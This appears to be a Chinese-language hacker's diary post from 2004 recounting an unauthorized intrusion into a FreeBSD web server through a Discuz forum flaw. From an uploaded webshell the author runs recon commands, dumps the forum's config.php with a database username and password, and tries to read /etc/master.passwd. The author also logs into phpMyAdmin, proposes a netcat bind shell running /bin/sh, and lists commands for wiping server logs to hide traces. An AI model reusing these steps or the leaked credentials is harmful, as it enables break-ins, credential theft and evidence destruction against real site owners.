今天利用discuz的漏洞进了个主机, 怎么进的不要问了. 用的工具傻瓜式操作:(
进了以后先看系统:
服务器时间 2004年12月23日 11:06:38
服务器域名 www.xxx.com
服务器IP地址 xx.xx.xx.xx
服务器操作系统 FreeBSD
服务器操作系统文字编码 zh-cn
服务器解译引擎 Apache/1.3.29 (Unix) PHP/4.3.6
Web服务端口 80
PHP运行方式 APACHE
PHP版本 4.3.6
运行于安全模式 No
服务器管理员 you@your.address
本文件路径 /home2/web/vhosts/s/scbeibei.com/www/bbs/attachments/newmm.php.
老实说我是第一次见到国内服务器用的FreeBSD操作系统.一下来了兴趣想看看里面有什么.
输入uname -a 这个是看是什么操作系统的
FreeBSD gate.sczg.com 4.10-RELEASE FreeBSD 4.10-RELEASE #0: Sat Oct 2 13:37:38 CST 2004
root@gate.sczg.com:/usr/src/sys/compile/sczg i386
输入id 这个是看有什么用户以及用户权限的
uid=1200(web) gid=80(www) groups=80(www)
uid=1200(web) 执行 webshell 的使用者 就是这个php程序的拥有者
gid=80(www) groups=80(www) 所属群组
如果是管理员权限的那么应该是这样:
%id
uid=0(root) gid=0(wheel) groups=0(wheel)
然后我输入了ls :)
newmm.php.
输入cat ../config.php 得到如下结果:
/*
[DISCUZ!] config.php - basically configuration of Discuz! Board
This is NOT a freeware, use is subject to license terms
Version: 2.0.0
Author: Crossday (info@discuz.net)
Copyright: Crossday Studio (www.crossday.com)
Last Modified: 2002/12/6 17:00
*/
// ==================== 以下变量需根据您的服务器说明档修改 ====================
// 注意: 如果数据库连接有问题,请不要向我们询问具体参数设置,请与空间商联系,
// 因为我们也无法告诉你这些变量应该设置为何值
$dbhost = 'localhost'; // 数据库服务器
$dbuser = 'db00203'; // 数据库用户名
$dbpw = 'bBUNgwpi'; // 数据库密码
$dbname = 'scbeibei_com'; // 数据库名
$adminemail = 'webmaste@scbeibei.com'; // 论坛系统 Email
// ============================================================================
// ============= 如您对 cookie 作用范围有特殊要求,请修改下面变量 ==============
$cookiepath = ''; // cookie 作用路径 (如出现登录问题请修改此项)
$cookiedomain = ''; // cookie 作用域 (如出现登录问题请修改此项)
// ============================================================================
// ============= Discuz! 插件,配置和使用方法详情请参考 plugin.txt ============
// 请参考 plugin.txt 中提供的方法配置插件接口
// ============================================================================
// ================= 以下变量为特别选项,一般情况下没有必要修改 ================
$headercharset = 0; // 强制设置字符集, 0=否, 1=是. 乱码时使用
$onlinehold = 600; // 在线保持时间(秒)
// 论坛投入使用后不能修改的变量
$tablepre = 'cdb_'; // 表名前缀, 同一数据库安装多个论坛请修改此处
$attachdir = './attachments'; // 附件保存位置 (服务器路径, 属性 777, 必须
// 为 web 可访问到的目录, 不加 "/")
$attachurl = 'attachments'; // 附件路径 URL 地址 (可为当前 URL 下的相对
// 地址或 http:// 开头的绝对地址, 不加 "/")
// 切勿修改以下变量,仅供程序开发调试用!
$database = 'mysql'; // 不能修改此处
$tplrefresh = 1; // 模板自动刷新开关 0=关闭, 1=打开
$pconnect = 0; // 数据库连接方式 0=connect, 1=pconnect
config 是存放 mysql 的信息的文件,现在我们得到了他的数据库信息:
用户db00203 密码bBUNgwpi
我想看看他的密码信息:
cat /etc/master.passwd
但是管理员设置了权限,我不能看到:(
现在看看他有没有phpmyadmin文件
locate phpmyadmin
locate 是寻找的意思,你可以用 locate *.doc 找出所有 副档名为 doc 的文件
结果真的有这个文件!从http://admin.sczg.com/phpMyAdmin/ 连上去.
上去看到了什么就不详细说了,反正基本上能有的都有了
输入ls /usr/local/bin
看到了用户可以执行的命令,没有nc. 荃荃说可以装个unix下的nc上去,
然后 ./nc -l -p 520 -e /bin/sh
bind 一个 port 出来 然后 telnet
但是还不知道权限够不够呢.
先写到这里吧, 其实这个主要是复习了一下bsd下的命令罢了, 我还有很多疑问
1.如果没有执行权限怎么办?
2.得到MySQL密码后有没有什么办法可以连接主机, 象SqlExec那样的可以执行
一些命令什么的吗?
记得昨天问人如何用phpmyadmin在网页上去连sqlserver,问了半天也没有问个所以然,
不过荃荃告诉我可以传个phpmyadmin上去.
我真笨, 为什么没有想到这个办法呢
还学了个几很实用的命令:
rm -fr /data/www/mhb/logs/*; chmod 400 /data/www/mhb/logs/ 没有日志
drwxr-xr-x 9 nobody nobody 1024 Oct 12 18:09 html
dr-------- 2 nobody nobody 512 Jan 4 05:59 logs
rm -fr /data/www/mhb/logs/*
remove
chmod 400 /data/www/mhb/logs/
dr-------- 2 nobody nobody 512 Jan 4 05:59 logs
ls -la /data/www/mhb/logs 清空log档案
还有我发现了一点,php下的unix和bsd只可以用主机漏洞的exp来提升权限,而不能借助原来文件夹下的某些软件来提升,
这个是和asp不同的地方, 所以提升权限很困难.
......还有好多问题,可是我要下了, 晚上再来看吧.